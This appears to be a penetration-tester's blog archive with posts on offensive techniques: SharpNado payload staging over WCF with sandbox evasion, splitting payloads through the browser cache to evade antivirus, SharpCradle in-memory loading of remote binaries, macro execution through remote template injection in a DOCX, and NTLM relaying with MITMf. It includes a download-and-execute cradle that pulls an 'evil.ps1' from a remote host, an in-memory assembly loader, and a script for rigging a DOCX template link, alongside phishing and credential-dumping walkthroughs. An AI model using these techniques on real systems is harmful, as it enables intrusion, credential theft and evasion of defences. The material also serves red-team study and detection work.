Wednesday, December 19, 2018

SharpNado - Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads


I am not a security researcher, expert, or guru.  If I misrepresent anything in this article, I assure you it was by accident, and I will gladly make any updates if needed.  This is intended for educational purposes only.


SharpNado is a proof-of-concept tool that demonstrates how one could use .NET Remoting or Windows Communication Foundation (WCF) to host smarter, dynamic .NET payloads.  SharpNado is not meant to be a fully functioning, robust payload delivery system, nor is it anything groundbreaking. It's merely something to get the creative juices flowing on how one could use these technologies, or others, to create dynamic and hopefully smarter payloads. I have provided a few simple examples of how this could be used to either dynamically execute base64 assemblies in memory or dynamically compile source code and execute it in memory.  This could, however, be expanded to include different kinds of stagers, payloads, protocols, etc.

So, what is WCF and .NET Remoting?

While a full discussion of these frameworks is beyond the scope of this blog, Microsoft describes Windows Communication Foundation as a framework for building service-oriented applications, and .NET Remoting as a framework that allows objects living in different AppDomains, processes, and machines to communicate with each other.  For the sake of simplicity, let's just say one of their use cases is allowing two applications on different systems to share information back and forth. You can read more about them here:


.NET Remoting
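To make the model a bit more concrete, here is a rough sketch of a minimal self-hosted WCF service. The interface, names, and port are purely illustrative assumptions for this post, not SharpNado's actual contract:

```csharp
using System;
using System.ServiceModel; // requires a reference to System.ServiceModel.dll

// The contract is all a client ever sees; the logic behind
// GetPayload() stays server side.
[ServiceContract]
public interface IPayloadService
{
    [OperationContract]
    string GetPayload(string clientInfo);
}

public class PayloadService : IPayloadService
{
    public string GetPayload(string clientInfo)
    {
        // Server-side decision making would live here.
        return "payload-for:" + clientInfo;
    }
}

class HostProgram
{
    static void Main()
    {
        using (var host = new ServiceHost(typeof(PayloadService),
            new Uri("http://localhost:8080/Service")))
        {
            host.AddServiceEndpoint(typeof(IPayloadService),
                new BasicHttpBinding(), "");
            host.Open();
            Console.WriteLine("Listening on http://localhost:8080/Service ...");
            Console.ReadLine();
        }
    }
}
```

A client built against (or sharing) IPayloadService can call GetPayload without ever seeing what sits behind it, which is the property the rest of this post leans on.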

A few examples of how this could be useful:

1. Smarter payloads without the bulk

What do I mean by this?  Since WCF and .NET Remoting are designed for communication between applications, they allow us to build logic server side to make smarter decisions depending on what information the client (stager) sends back to the server.  This means our stager can stay small and flexible while we build complex rules server side that change what the stager executes depending on environmental conditions.  A very simple example of payload logic would be the classic: if the domain user equals X, fire; if not, don't.  While this doesn't seem very climactic, you could easily build in more complex rules.  For example, if the domain user equals X, the internal domain is correct, and user X has administrative rights, run payload Y; if user X is a standard user and the internal domain is correct, run payload Z.  Adding to this, we could say that if user X is correct but the internal domain is a mismatch, send back the correct internal domain and let me choose whether to fire the payload.  These back-end rules can be as simple or complex as you like.  I have provided a simple sandbox evasion example with SharpNado that could be expanded upon, along with a quick walkthrough in the examples section below.
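As a sketch of what such server-side rules might look like — the user, domain, and payload names here are hypothetical, and LoadPayload() stands in for however payloads are actually stored and read:

```csharp
// Hypothetical server-side rule set. All names and payload labels are
// illustrative; LoadPayload() is a placeholder for payload retrieval.
public string SelectPayload(string user, string domain, bool isAdmin)
{
    if (domain != "CORP.LOCAL")
        return LoadPayload("decoy");        // wrong environment: serve a decoy

    if (user == "targetUser")
        return isAdmin
            ? LoadPayload("payloadY")       // elevated target user
            : LoadPayload("payloadZ");      // standard target user

    return LoadPayload("decoy");            // anyone else: harmless response
}
```

Because this lives behind the service interface, changing the rules never requires touching the stager itself.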

2. Payloads can be dynamic and quickly changed on the fly:

Before diving into this, let's talk about some traditional ways of payload delivery and then look at how a technology like WCF or .NET Remoting could be helpful.  In the past, and still today, many people hard-code their malicious code into the payload they send, often using some form of encryption that only decrypts and executes upon meeting some environmental variable.  Alternatively, they use a staged approach, where a non-malicious stager reaches out to the web, retrieves the malicious code, and executes it as long as environmental variables align.  These approaches are fine and still work well even today, and I am in no way tearing them down or saying better ways don't exist.  I am just using them as a starting point to show how the technique below could be helpful and up the game a bit, so just roll with it.

So what are a few of the pain points of traditional payload delivery?  With the hard-coded payload, we usually want to keep our payloads small, so the complexity of the malicious code we execute is minimal; hence many use a stager as the first step of the payload.  Secondly, if we send out 10 payloads and the first one gets caught by endpoint protection, then even if the other 9 get executed by their targets, they too will fail.  We would have to create a new payload, pick 10 new targets, and again hope for the best.

Using WCF or .NET Remoting, we can easily create a light stager that lets us quickly switch what the stager executes.  We can do this either through back-end server logic, as discussed above, or by quickly setting different payloads within the SharpNado console.  So, let's say our first payload gets blocked by endpoint protection. Since we already know our stager tried to execute the first payload, due to the way the stager and server communicate, we can use our deductive reasoning skills to conclude that our stager is fine but the malicious code it tried to execute got caught. We can quickly switch, in the console, to our super stealthy payload, and the next time any of the stagers execute, the super stealthy payload will fire instead of the one that got caught. This saves us the hassle of sending a new payload to new targets.  I have provided simple examples of how to do this with SharpNado that could be expanded upon, along with a quick walkthrough in the examples section below.

3. Less complex to setup:

You might be thinking to yourself that you could do all this with mod_rewrite rules, and while that is absolutely true, mod_rewrite rules can be a little more complex and time consuming to set up.  This is not meant to replace mod_rewrite or anything.  Long live mod_rewrite!  I am just pointing out that writing your back-end rules in a language like C# allows for easier-to-follow rules, modularization, and data parsing/presentation.

4. Payloads aren't directly exposed:

What do I mean by this?  You can't just point a web browser at the server IP and see payloads sitting in some open web directory to be analyzed or downloaded.  To capture payloads, you would need some form of MitM between the stager and the server.  This is because, when using WCF or .NET Remoting, the malicious code (payload) you want your stager to execute, along with any complex logic you want to run, sits behind the remote server interface.  That interface exposes only the remote server-side methods, which can then be called by your stager. If at this point you are thinking WTF, I encourage you to review the links above and dive deeper into how WCF or .NET Remoting works, as there are many people who explain and understand it better than I ever will.

Keep in mind that you would still want to encrypt all of your payloads before they are sent over the wire to better protect them.  You would also want to use other evasion techniques, for example, tracking the number of times the stager has been called or how much time has passed since the stager was sent, etc.

5. Been around a while:

.NET Remoting and WCF have been around a long time. There are tons of examples out there from developers of legitimate ways to use these technologies, and it is probably a pretty safe bet that many organizations are still using them in legit applications. Like you, I like exposing ways one might do evil with things people use for legit purposes and hopefully bringing them to light. Lastly, the above concepts could be used with other technologies as well; this just highlights one of many ways to accomplish the same goal.


Simple dynamic + encrypted payload example:

In the first example, we will use SharpNado to host a base64 version of SharpSploitConsole and execute Mimikatz's logonpasswords function.  First, we will set up the XML payload template that the server will use when our stager executes.  Payload template examples can be found on GitHub in the Payloads folder.  Keep in mind that the ultimate goal would be to have many payload templates already set up that you could quickly switch between. The below screenshots give an example of what the template would look like.

Template example:

This is what it would look like after pasting in base64 code and setting arguments:

Once we have our template payload set up, we can go ahead and run SharpNado_x64.exe (with Administrator rights) and set up the listening service that our stager will call out to. In this example we will use WCF over HTTP on port 8080, so our stager should be set up to connect to that address.  I would like to note two things here.  First, with a little bit of work up front server side, this could be modified to support HTTPS.  Secondly, SharpNado does not depend on the templates being set up prior to running; you can add, delete, or modify templates at any time while the server is running, using whatever text editor you like.

Now let's see what payloads we currently have available.  Keep in mind you may use any naming scheme you would like for your payloads.  I suggest naming payloads and stagers what makes most sense to you.  I only named them this way to make it easier to follow along.

In this example I will be using the b64SharpSploitConsole payload and have decided that I want the payload encrypted server side and decrypted client side using the super secure password P@55w0rd.  I would like to note here (outlined in red) that it is important to set your payload directory correctly, as this directory is what SharpNado uses to pull payloads.  A good way to test this is to run the command "show payloads"; if your payloads show up, you know you set it correctly.

Lastly, we will set up our stager.  Since I am choosing to encrypt the payload, I will be using the SharpNado_HTTP_WCF_Base64_Encrypted.cs stager example found in the Stagers folder on GitHub.  I will simply be compiling this and running the stager exe, but it could be delivered via DotNetToJScript or by some other means if you like.

Now that we have compiled our stager, we will start the SharpNado service by issuing the "run" command.  This shows us what interface is up and what the service is listening on, so it is good to check this to make sure, again, that everything is set up correctly.

Now when our stager gets executed, we should see the below.

And on our server side we can see that the encrypted server method was indeed called by our stager.  Keep in mind, we can build in as much server logic as we like.  This is just an example.

Now, for demo purposes, I will quickly change the payload to b64NoPowershell_ipconfig_1, and when we run the exact same stager again, it will instead return our ipconfig information.  Again, this is only a simple demonstration of how quickly you can change out payloads.

Simple sandbox evade example:

In this second example, I will go over an extremely watered-down version of how you could use SharpNado to build smarter payloads.  The example provided with SharpNado is intended to be a building block and could be made as complex or as simple as you like.  Since our SharpNado service is already running from our previous example, all we need to do is set the payloads to use in the SharpNado console.  For this example, I will again be using the same payloads from above: the b64SharpSploitConsole payload if we hit our correct target, and the b64NoPowershell_ipconfig_1 payload if we don't.

Looking at our simple stager example below, we can see that if the user anthem executed our stager, the stager will send a 1 back to the SharpNado service; otherwise, a 0 will be sent.  Please keep in mind that you could send back any information you like, including username, domain, etc.

Below is a partial screenshot of the example logic provided with SharpNado. Another thing I want to point out is that I provided an example of how you could count how many times the service method has been called and, depending on a threshold, kill the service.  This is an example of building in countermeasures for when we think we are being analyzed and/or sandboxed.
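A minimal sketch of that call-counting countermeasure could look like the following. The threshold, field names, and kill behavior are all illustrative assumptions, not SharpNado's exact implementation:

```csharp
// Illustrative sketch: count service-method invocations and shut down past
// a threshold, on the theory that repeated calls suggest automated analysis.
private static int callCount = 0;
private const int Threshold = 5;

public string GetPayload(int targetMatch)
{
    if (System.Threading.Interlocked.Increment(ref callCount) > Threshold)
        System.Environment.Exit(0);   // too many calls: assume sandbox, kill the service

    // 1 means the stager saw the expected user; anything else gets the decoy.
    // realPayloadB64 / decoyPayloadB64 are hypothetical fields holding the payloads.
    return targetMatch == 1 ? realPayloadB64 : decoyPayloadB64;
}
```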

Moving forward, when we run our stager as the anthem user, we can see that we get a message server side and that the correct payload fired.

Now, if I change the user to anthem2 and go through the process again, we can see that our non-malicious payload fires.  Keep in mind, the stagers could be set up so that values aren't hard-coded in.  You could have a list of users on your server, have your stager loop through that list, execute if anything matches, and do something else if not.  Again, it's really up to your imagination.

Compile source code on the fly example:

Let's do one more quick example, this time using C# source code.  This stager method uses System.CodeDom.Compiler, which briefly drops files to disk right before executing in memory, but one could create a stager that takes advantage of Roslyn, the open-source C# and VB compiler, to do the same thing without touching disk, as pointed out by @cobbr_io in his SharpShell blog post.
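For reference, the core of a CodeDom compile-and-execute step looks roughly like this. The demo source string is harmless and hard-coded here; in a stager like the one described above, the source would arrive from the service instead:

```csharp
using System;
using System.CodeDom.Compiler;
using Microsoft.CSharp;

class CompileDemo
{
    static void Main()
    {
        // In a real stager this string would come from the remote service.
        string source = @"
            public class Runner {
                public static void Run() {
                    System.Console.WriteLine(""compiled and ran in memory"");
                }
            }";

        var options = new CompilerParameters
        {
            // Note: even with GenerateInMemory, CodeDom briefly writes
            // temporary files to disk during compilation.
            GenerateInMemory = true
        };

        using (var provider = new CSharpCodeProvider())
        {
            CompilerResults results = provider.CompileAssemblyFromSource(options, source);
            results.CompiledAssembly
                   .GetType("Runner")
                   .GetMethod("Run")
                   .Invoke(null, null);
        }
    }
}
```

Swapping CodeDom for Roslyn (Microsoft.CodeAnalysis) would follow the same shape while keeping compilation entirely in memory.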

The below payload template example runs a No PowerShell payload that executes ipconfig, but I have also provided examples on GitHub that would execute a PowerShell Empire agent or a Cobalt Strike Beacon:

Then we will set up our stager.  In this example I will use the provided GitHub stager SharpNado_HTTP_WCF_SourceCompile.cs.

We will then take our already running SharpNado service and quickly add our payload.

Now when we run our stager, we should see our ipconfig output.


Hopefully this has been a good intro to how one could use WCF or .NET Remoting offensively, or at least sparked a few ideas for you to research on your own. I am positive there are much better ways to accomplish this, but it was something I came across while doing other research, and I thought it would be neat to whip up a small POC.  Till next time, and happy hacking!

Link to tools:

SharpNado -

SharpNado Compiled Binaries -

SharpSploitConsole -

SharpSploit -

Wednesday, December 5, 2018

Evading Sandboxes and Antivirus Through Payload Splitting

Malware has been using the Temporary Internet Files folder structure as a launching point for the past 20 years, but from an offensive standpoint I haven’t seen much else that leverages the quirks and functionality it can provide.  A few weeks back, during an engagement, I noticed the wide variety of file types present in the folder structure that appeared to be directly downloaded from the internet and were in no way obfuscated, compressed, or restricted.  Due to a few other projects I was working on at the time, I started thinking about the potential implications of this, as well as the limits to which it could be taken.  The result of this research was a technique for splitting payloads to evade antivirus and sandboxes, which also provides a potential new method for payload encryption / environmental keying.

As part of penetration tests, I find myself more often hosting payloads on a third-party site and sending a link to the site in the phish, versus simply including the payload as an email attachment.  This is due in large part to the numerous steps organizations have taken in recent years to restrict and inspect the files entering their networks in this manner.  However, as the end user is now visiting a site I control as part of the phish, this provides a new opportunity to transparently download code onto their system into the Temporary Internet Files folder structure via an iframe, as well as deliver a traditional payload.  We can then code that payload to not execute anything malicious itself, but rather search the local file system and execute instructions / compile from the code located in the user’s temporary internet files.  This technique can evade antivirus, as neither file on its own is considered malicious, and evades sandboxes, as the appliance will not have visited the same page the user did and thus will not have a copy of the code pulled via the iframe.  Below is an in-depth walkthrough of the setup and operation of this vector.

A Background on Temporary Internet Files and Caching

‘Temporary Internet Files’ (INetCache in Windows 10) is a user-specific folder located in %userprofile%\appdata\local\microsoft\windows which acts as the repository for files downloaded while browsing the web with Internet Explorer (Edge uses a similar method for temporary file storage but has a separate directory structure).  Although these files appear to be in a single folder when browsed through the GUI and browser, in reality they exist in a variety of randomly named, system-generated folders that lie several directories deeper in the folder structure.  Files stored in this structure are cached to decrease required network demand and allow sites to load more quickly.  Chrome and Firefox store their temporary internet files in a compressed format, making them less accessible than those downloaded through IE.

The server typically controls caching, and as we will see later, it can set varying lifetimes for resources before the client requests them again.  This makes sense, as some resources (such as a corporate logo or a video embedded on a website) rarely change and thus can be downloaded periodically rather than every time the site is loaded.  However, this means the client is downloading code to its local disk from a remote location without any prompts or warnings to the end user.  This by itself does not represent a security risk, and clicking through to accept a huge number of download requests on every site you visit would get old extremely quickly.  Rather, it is the way that IE and Edge cache flat files in a (relatively) easily findable location that initially caught my attention, as I found I could coerce a download of a file from the server to the client and subsequently access a fully readable copy sitting in the previously mentioned folder structure on the client’s system.

Setting up Apache

In order to get files downloaded onto client systems connecting to us, we first need to set up our server to add the requisite headers to our traffic.  Luckily, Apache has pre-built modules that help us do exactly what we need.  Using a standard Ubuntu / Debian box, we enable mod_headers and mod_expires (through a2enmod headers and a2enmod expires, respectively).  From there, we modify our virtual host file (in /etc/apache2/sites-available/) to include the necessary rules (in this example we’ll be using a .xml file to host code to be compiled on the client system):
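The relevant virtual-host rules look something like the following — a sketch assuming mod_headers and mod_expires are enabled, with the match pattern adjusted to whatever file type you are serving:

```apache
# Cache any served .xml file client side for one week (604800 seconds).
# Requires mod_headers and mod_expires.
<FilesMatch "\.xml$">
    ExpiresActive On
    ExpiresDefault "access plus 1 week"
    Header set Cache-Control "max-age=604800, public"
</FilesMatch>
```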

Really, all this does is say that any .xml file that is served should have a Cache-Control header set on it, with an expiration of 604800 seconds (one week) from when it is downloaded.  This means that if the browser attempts to access the site again, it will perform a delta against the timestamp of the initial file, and if it is less than one week old, it will not request an updated version from the server.  Performing a curl of a resource with cache control set up and comparing it against one that does not have it (such as a .html file) shows us that our configured rules are working as intended:

Building Hosted Files and the Landing Page

Before we can configure our landing page, we need to set up a hosted file that will be dropped onto the client’s system and determine what we want it to do.  IE is typically pretty open with the types of files it will automatically download, and I’ve had success with a variety of file extensions (.vbs, .ps1, .xml, etc.).  However, in our example we’ll be using an MSBuild-compatible .xml stager that contains C# source code, which when built will in turn grab a second-stage assembly from a remote web server and execute it in memory.  An example of the general outline of this stager code can be found here: We’ll run this code through VT and make sure we’re not going to get picked up immediately:

We’ll next need to create a payload that the user will download to begin the execution chain.  For this example, we’ll use a basic .hta file containing some VBScript code that searches for our file within the known Temporary Internet Files directory structure and uses MSBuild to compile and run our source code if it is found.  In practice, this could be any of a wide variety of payloads already utilized in traditional phishing attacks, but with the added benefit of splitting code to further evade detection.  One important thing to note: as we’re searching based on the name of the .xml file written to disk, using a unique or sufficiently long randomized string is recommended.

Now that we have our hosted files set up, we can move on to building the actual server-side infrastructure of a landing page that will host them.  In our example we have an extremely simple page that hosts a file download and also contains the hidden iframe that loads our .xml payload file, which, if configured correctly, should cause the C# source code hosted in the .xml file to be downloaded to the client system.

In a real-world scenario, I would likely include the iframe on the initial landing page (e.g., a page requiring a user login to access a secure email) and host the actual file download on a separate page.  This can also be accomplished through the use of an HTML redirect on the landing page.  However, this will be all we need for a demo, and we should now have our server ready to deliver both our source code files and our selected payload.

Putting It Together

Now that we have an understanding of the process behind the attack, we’ll run through an example demoing the full execution chain on a fully patched Windows 10 box, to see how we can gain execution of an arbitrary C# assembly hosted on an external website from our initial HTA download.  Let’s first browse out to the web page we set up on our server (pretending that we received a phishing link directing us to this site):

Cool, nothing too crazy going on right now on the web console. I see the link to the download of the .hta file we'll use for first-stage execution, but that's about it.  Let's take a look and see if our iframe functioned as intended to download the linked .xml file to disk:

Looks like it was successfully downloaded; now let's quickly validate that our code is actually in there:

So we now have our C# code sitting in a .xml file in a fairly easy-to-find spot on the disk. Let's execute our .hta payload from the website and see what happens:

Awesome, we got code execution from our second-stage assembly that was hosted on a remote server.

Concerns and Additional Uses

In the process of researching this, I stumbled upon several items I wanted to mention in addition to the walkthrough above.  First, several of my colleagues raised the extremely valid concern of browser compatibility.  After all, it is not guaranteed that users will visit your website with IE; they may instead be using Chrome, Firefox, Edge, etc.  The best answer here lies with Apache’s mod_rewrite functionality.  An inspection of the connecting user agent will allow your server to determine which payload to serve, and to either redirect those connecting with non-compatible browsers to a splash page saying the site is only viewable in IE, or present them with a different payload not dependent on this technique.  It is also worth mentioning that this technique is fully compatible with the Edge browser (if anyone happens to be using it), but as Edge uses a separate directory structure from IE, unique payloads will need to be created, or a single payload that searches both trees will need to be built.
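A hedged sketch of such a user-agent rule — the browser-token regex and page names here are illustrative only:

```apache
RewriteEngine On
# Send anything that is not IE (MSIE/Trident tokens) or Edge to a fallback page.
RewriteCond %{HTTP_USER_AGENT} !(MSIE|Trident|Edge) [NC]
RewriteRule ^landing\.html$ /ie-only.html [R=302,L]
```

The same conditions could instead serve an alternate payload rather than a redirect, depending on the scenario.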

Secondly, a topic that was not touched on but may also be of interest is the applicability of this technique to payload encryption and environmental keying. Rather than an iframe coercing a file download containing code to execute, it could simply contain a decryption key.  As this file would only be present on the system that browsed to the site containing the iframe, the payload could not be decrypted elsewhere, even by another system on the same domain or one logged into by the same user.  The encrypted payload would perform a function similar to the VBScript payload shown above, in that it would simply search for a file with a specific, pre-determined name and attempt to extract the decryption key.  If successful, the primary payload would decrypt and execute.

Finally, although all demos were done on an internal lab range, the process has been tested repeatedly over the internet from several cloud-hosted boxes with success on all stages of the process.


This was a very simple example of a payload that could be built from two separate files and combined into an effective attack vector.  I’m sure there are way cooler ways to utilize this and make more effective payloads, from something as simple as scripting cleanup of the initial stager files from disk upon successful execution, to payload encryption and staging of complex projects through multiple files dropped to disk.

Wednesday, October 24, 2018

SharpCradle - Loading remote C# binaries and executing them in memory


I am not a security researcher, expert, or guru.  If I misrepresent anything in this article, I assure you it was by accident, and I will gladly make any updates if needed.  This is intended for educational purposes only.


Over the last 4-5 years, I have dabbled with using C# for offensive purposes, starting first with running PowerShell via C# runspaces and then slowly digging into other ways the language could be used offensively.  This eventually led to an idea a few years ago of attempting to write a post-exploitation framework entirely in C#.  Unfortunately, no one told me that trying to write a fully functioning post-exploitation framework by yourself is not only extremely time consuming but also extremely hard.  So I decided it would be much easier to release small tools with the functionality of some of the modules I had been working on, the first release being SharpCradle.

What it does:

SharpCradle loads a remote C# PE binary from either a remote file share or a web server, using the file / web stream classes (respectively), into a byte[] array in memory.  This array is then executed using the Assembly class.
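Conceptually, the web-stream variant boils down to something like the following sketch. The URL and argument handling are simplified placeholders, not SharpCradle's exact code:

```csharp
using System;
using System.Net;
using System.Reflection;

class Cradle
{
    static void Main(string[] args)
    {
        // Pull the managed PE straight into memory; nothing is written to disk here.
        byte[] bytes = new WebClient().DownloadData("http://example.com/program.exe");

        // Load it as a .NET assembly and invoke its entry point.
        Assembly asm = Assembly.Load(bytes);
        asm.EntryPoint.Invoke(null, new object[] { args });
    }
}
```

Note that the Invoke call must match the target's Main signature (pass null instead of the args array if its Main takes no parameters), and as the section below points out, this only works for managed binaries.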

How this could be useful:

SharpCradle isn't exactly the same as our traditional PowerShell download cradle ( IEX (New-Object Net.Webclient).downloadstring("http://IP/evil.ps1") ), but the concept, at least to me, is the same.  We are simply reaching out from our victim's machine to somewhere remote, retrieving our evil code, and executing it in memory.  This helps bypass endpoint protections by making it harder to detect exactly what we are up to.  In fact, I have used this on a wide variety of client engagements and it has yet to get flagged, though I am sure that will eventually change, as defenses are getting better every day.


This does not work for ALL binaries but only those written using managed code, such as C# or Visual Basic .NET.

Short example:

Since my good friend @g0ldengunsec and I just released SharpSploitConsole v1.1, which takes advantage of the awesome tool SharpSploit written by @cobbr_io, I will be using it as my "evil.exe" program that we will pull into memory using SharpCradle.

By running SharpCradle.exe without any arguments, you will see the below:

By simply running SharpCradle.exe with the -w flag and giving it the web address of SharpSploitConsole_x64.exe, along with arguments, you will see that we are able to execute SharpSploitConsole in memory without the SharpSploitConsole binary ever touching disk.

An example of downloading the binary into memory and executing the function logonpasswords from mimikatz would look like the below:

Since SharpCradle also has the ability to retrieve binaries from a file share, we could, for example, use Impacket to spin up a quick anonymous file share on our attack system and call our evil.exe from there.  We could also go as far as to combine this with post-exploitation frameworks. Cobalt Strike's execute-assembly function currently has a 1MB limit; SharpCradle could be used as a way around this, by using Cobalt Strike to execute SharpCradle to pull in binaries larger than 1MB.

Lastly, I have left a few links to where you can grab the tool, as well as standalone .cs files for both the web stream and file stream versions, in case you want to customize your own.

Link to tools:

SharpCradle GitHub -

SharpCradle Compiled Binaries -

SharpCradleWeb.cs -

SharpCradleFileShare.cs -

SharpSploitConsole -

SharpSploit -

Wednesday, July 18, 2018

Executing Macros From a DOCX With Remote Template Injection

The What:

In this post, I want to talk about and show off a code execution method that was shown to me a little while back. This method allows one to create a DOCX document that will load up and allow a user to execute macros from a remote DOTM template file. This attack has been seen in the wild, is partially included in open-source offensive security tools, and has been blogged about by Cisco Talos, but in that blog post and the open-source tool, it is only presented as a credential stealing attack, typically over the SMB protocol. This blog post details how to use this method to download a macro-enabled template over HTTP(S), in a proxy-aware manner, into a DOCX document.

The Why:

The benefit of this attack versus a traditional macro-enabled document is multidimensional. When executing a phishing attack against a target, you are able to attach the .docx directly to the email, and you are very unlikely to get blocked based on the file extension. Many organizations block .doc or .docm but allow .docx, because .docx files are not supposed to be able to contain macros.

Another reason this attack will likely land more often is that the attachment itself does not contain malicious code. The macro is not seen by any static email scanners, so it is less likely to be blocked. In the event that your target uses a sandbox to detonate email attachments, you can use various sandbox evasion techniques, such as mod_rewrite rules or IP limiting, to prevent the sandbox from pulling down the malicious template. @bluescreenofjeff has a wonderful guide on creating mod_rewrite rules for this type of evasion in his Red Team Infrastructure Wiki.

The How:

To start this attack, we need to create two different files. The first will be the macro-enabled template, or .dotm file, which will contain a malicious VBA macro. The second will be the seemingly benign .docx file, which contains no malicious code itself, only a target link pointing to your malicious template file.

Getting Started:

In my blog posts and the trainings I provide to others, I aim to show examples using free and open-source tools. I do this because I want anyone reading this blog to be able to try it on their own (always against their own systems, or systems they have permission to test) and do not want to force people into purchasing commercial tools. For this reason, I will walk through the steps for creating the remote template document to execute a PowerShell Empire payload. To keep to the purpose of this post, I won’t detail how to create the listener or the macro for Empire here; there are many tutorials out there on how to do this already. I will just walk through creating the documents to execute the macro.

Creating the Macro-Enabled Template:

For this attack to work, we need to create a macro-enabled Word template (.dotm file extension) which contains our malicious Empire macro. Open up Word and make the Developer tab on the ribbon visible:

Then open up the Visual Basic editor from the Developer tab and double-click on ThisDocument under the current project to open up the code window. Paste in your macro code into this window:

Give the template a name and save the file as a .dotm format. Please note that the name is usually briefly visible to the user, so I recommend something seemingly benign such as ‘InvoiceTemplate.dotm’:

Since I am just using the default macro from PowerShell Empire, it is quickly picked up by Windows Defender, so I am going to disable Defender for the demo. If your target uses Windows Defender, you will need to pick a different tool or obfuscate the macro until you have a working payload.

At this point, I tend to like to validate my template and macro by just double-clicking on the document and making sure that I get the ‘Enable Content’ button and that I get an agent when I click on it:

It works!

Creating the Remote-Template-Loading Document:

With the template working, we now need to create a .docx file that will download and load in the template from a remote resource. The easiest way in which I have found to do this is to create a .docx document from one of the provided Word templates, then just modify the target:

Modify the document as necessary to meet your phishing scenario in order to get your target user to click the ‘Enable Content’ button if it shows up for them. Save your document in the .docx format.

Next, locate the document, right-click it, and rename the extension from .docx to .zip. Extract the contents of the zip file and browse to the extracted folder.

Note: With the release of Office 2007, Microsoft introduced the file formats that end in an 'x' character. Each of these formats is just a zip file containing mostly .xml and .rels files. You can manually edit the document and its properties by changing these files and then re-zipping the contents.
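If you want to convince yourself of the note above, a couple of lines of Python will do it; any .docx or .dotm opens directly as a zip archive (the filename below is hypothetical):

```python
import zipfile

def list_docx_parts(path):
    """Return the internal file names of an OOXML document.

    Works on any of the 'x'/'m' Office formats (.docx, .dotm, .xlsx, ...)
    since they are all plain zip archives under the hood.
    """
    with zipfile.ZipFile(path) as z:
        return z.namelist()

# Example (assumes a document named demo.docx exists):
# list_docx_parts("demo.docx")
# -> ['word/document.xml', 'word/_rels/settings.xml.rels', ...]
```

You will typically see entries like `word/document.xml` and the `word/_rels/` folder that we edit in the next section.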

Navigate to the ‘.\word\_rels\’ folder and open up the ‘settings.xml.rels’ file using a text editor such as Notepad:

The Relationship tag whose Type ends in attachedTemplate is the setting that tells Word where to load your template from when the .docx is opened. Currently, it is loading a template from the local file system:

The key is that this value will accept web URLs. We can modify the Target value to be a remote location. In this case, I host my macro-enabled template on GitHub:

Once we save this file, we can zip the contents back up and rename the file back to a .docx. The next time that we open up our .docx, we can see that the file is reaching out over HTTPS to our hosting service to download the template:
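The unzip, edit, and re-zip steps above can also be scripted. Below is a minimal Python sketch of the same idea; the function name, file names, and template URL are all hypothetical, and it assumes the .docx was created from a template so that `word/_rels/settings.xml.rels` already contains an attachedTemplate relationship:

```python
import re
import zipfile

def set_remote_template(docx_in, docx_out, template_url):
    """Copy a .docx, rewriting the Target of the attachedTemplate
    relationship in word/_rels/settings.xml.rels to a remote URL."""
    rels_path = "word/_rels/settings.xml.rels"
    with zipfile.ZipFile(docx_in) as zin, \
         zipfile.ZipFile(docx_out, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            data = zin.read(item.filename)
            if item.filename == rels_path:
                # Swap whatever local Target is on the relationship
                # for our remote template URL.
                data = re.sub(rb'Target="[^"]*"',
                              b'Target="' + template_url.encode() + b'"',
                              data, count=1)
            zout.writestr(item, data)

# Hypothetical usage:
# set_remote_template("invoice.docx", "invoice-armed.docx",
#                     "https://example.com/InvoiceTemplate.dotm")
```

This avoids the manual rename-to-.zip dance entirely and keeps every other part of the document byte-for-byte intact.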

And now our .docx file has a macro loaded in it and is allowed to run macros:

There is a new pop-up shown to the user, but it does not affect the payload; .docx files are simply not intended to contain macros. If the user clicks 'Enable Content' or has macros set to run automatically, we get our agents:

Now prep your phishing email, send the .docx to the user, and wait for the call backs!

Friday, August 18, 2017

NTLMRelayX and MITMf


Recently I have been playing around with the Man-In-The-Middle Framework (MITMf) and have found it to be the most successful tool for me on internal penetration tests, and significantly more reliable than similar spoofing tools such as Ettercap. MITMf is a modular framework written in Python which is capable of both establishing MITM attacks and utilizing them in very productive ways. The built-in modules make performing complicated MITM attacks extremely simple, with things such as SMBAuth, BeEF injection, MSF's BrowserSniper, BDFProxy, NetCreds, Responder, etc. I highly recommend it over any other MITM tool. Learn it, use it, live it.

There are a lot of people who use tools such as Responder to trick systems into sending NTLM credentials and then relay them with SMBRelayX (if you aren't already doing this on internals, get on it). Although highly successful, this is quickly becoming more difficult to pull off as a pentester. If you were not aware, Microsoft basically killed off the success of Responder with MS16-077 by disabling NetBIOS-NS by default; NetBIOS-NS is what allowed us to impersonate systems to other systems on our local subnet and capture NTLM hashes. In situations where the client has not applied this patch (or has re-enabled NetBIOS-NS) and the affected users have administrative rights, you could get lucky and relay those credentials to a system where the connecting user is an administrator, but in my experience that is rare and tends to succeed only in environments which have 10 other ways in. My goal was to rely on similar methods but reduce or eliminate the luck required to pull off this type of attack.

The first step in eliminating the luck is to become less reliant on Responder and the way it works. Responder requires systems to be broadcasting lookups for certain hosts via NetBIOS-NS or LLMNR; if the client has patched MS16-077, this is unlikely to happen for you. Another way to force users to connect to you and send NTLM hashes is with crafty thinking, terrible design decisions on Microsoft's end, and the wonderful MITMf tool. I will discuss how the module works in detail later in this guide, but MITMf ships with a module called SMBAuth which injects HTML tags into cleartext HTTP traffic (or successfully MITM'd SSL/TLS traffic) and causes Internet Explorer or Microsoft Edge to establish SMB connections to your system. The browser will automatically send you the authentication information of the current user! A new way to get those hashes.

The second step in eliminating luck is not relying on successfully cracking password hashes. SMBRelayX is a great tool for this, as it can take the hash received and relay it to a system on the network of your choosing to attempt to authenticate as that user. The key here is that it relays to a single system. If the user is not an administrator of that specified system, you will not be able to execute code, and you will be very limited in what you can do at all.

My suggested approach, which avoids both having to crack passwords and having to guess which systems a user might be an admin on, is to use NTLMRelayX, an Impacket module which is very similar to SMBRelayX but supports relaying in a round-robin format to multiple hosts. This tool accepts a list of hosts as input, and with each connection it will relay credentials to the next host in the provided list. If we point it at every accessible Windows host in the environment and MITM long enough, we will execute code on any machine that the user has local administrative access on*.
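The round-robin behavior is the key difference from SMBRelayX, and it can be pictured with a few lines of Python. This is an illustration of the idea only, not NTLMRelayX's actual code, and the target IPs are made up:

```python
from itertools import cycle

# Hypothetical target list; NTLMRelayX reads these from the -tf file.
targets = ["10.0.0.5", "10.0.0.6", "10.0.0.7"]
next_target = cycle(targets)  # endlessly loop over the list

def relay(connection_id):
    """Each inbound NTLM connection is relayed to the next host in turn."""
    host = next(next_target)
    return "relaying connection {} -> {}".format(connection_id, host)

results = [relay(i) for i in range(5)]
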